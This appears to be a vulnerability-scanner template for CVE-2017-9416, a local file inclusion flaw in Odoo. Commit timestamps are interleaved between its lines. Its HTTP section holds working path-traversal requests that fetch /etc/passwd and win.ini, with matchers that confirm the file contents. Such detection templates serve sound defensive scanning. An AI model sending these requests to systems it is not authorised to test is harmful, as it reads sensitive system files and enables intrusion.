2023-03-24 13:22:55 +00:00
id : CVE-2017-9416
info :
2023-04-12 17:34:15 +00:00
name : Odoo 8.0/9.0/10.0 - Local File Inclusion
2023-03-24 13:22:55 +00:00
author : Co5mos
severity : medium
description : |
2023-04-12 19:44:23 +00:00
Odoo 8.0, 9.0, and 10.0 are susceptible to local file inclusion via tools.file_open. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
2023-03-24 13:22:55 +00:00
reference :
- https://github.com/odoo/odoo/issues/17394
- https://nvd.nist.gov/vuln/detail/CVE-2017-9416
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
cvss-score : 6.5
cve-id : CVE-2017-9416
cwe-id : CWE-22
2023-03-28 12:22:50 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 2
2023-06-04 08:13:42 +00:00
verified : true
2023-03-25 17:38:14 +00:00
tags : cve,cve2017,odoo,lfi
2023-03-24 13:22:55 +00:00
2023-04-27 04:28:59 +00:00
http :
2023-03-24 13:22:55 +00:00
- method : GET
path :
2023-03-25 17:38:14 +00:00
- "{{BaseURL}}/base_import/static/c:/windows/win.ini"
- "{{BaseURL}}/base_import/static/etc/passwd"
2023-03-24 13:22:55 +00:00
stop-at-first-match : true
matchers-condition : or
matchers :
- type : dsl
dsl :
- "regex('root:.*:0:0:', body)"
- "status_code == 200"
condition : and
- type : dsl
dsl :
- "contains(body, 'bit app support')"
- "contains(body, 'fonts')"
- "contains(body, 'extensions')"
- "status_code == 200"
condition : and
2023-04-12 17:34:15 +00:00
# Enhanced by md on 2023/04/12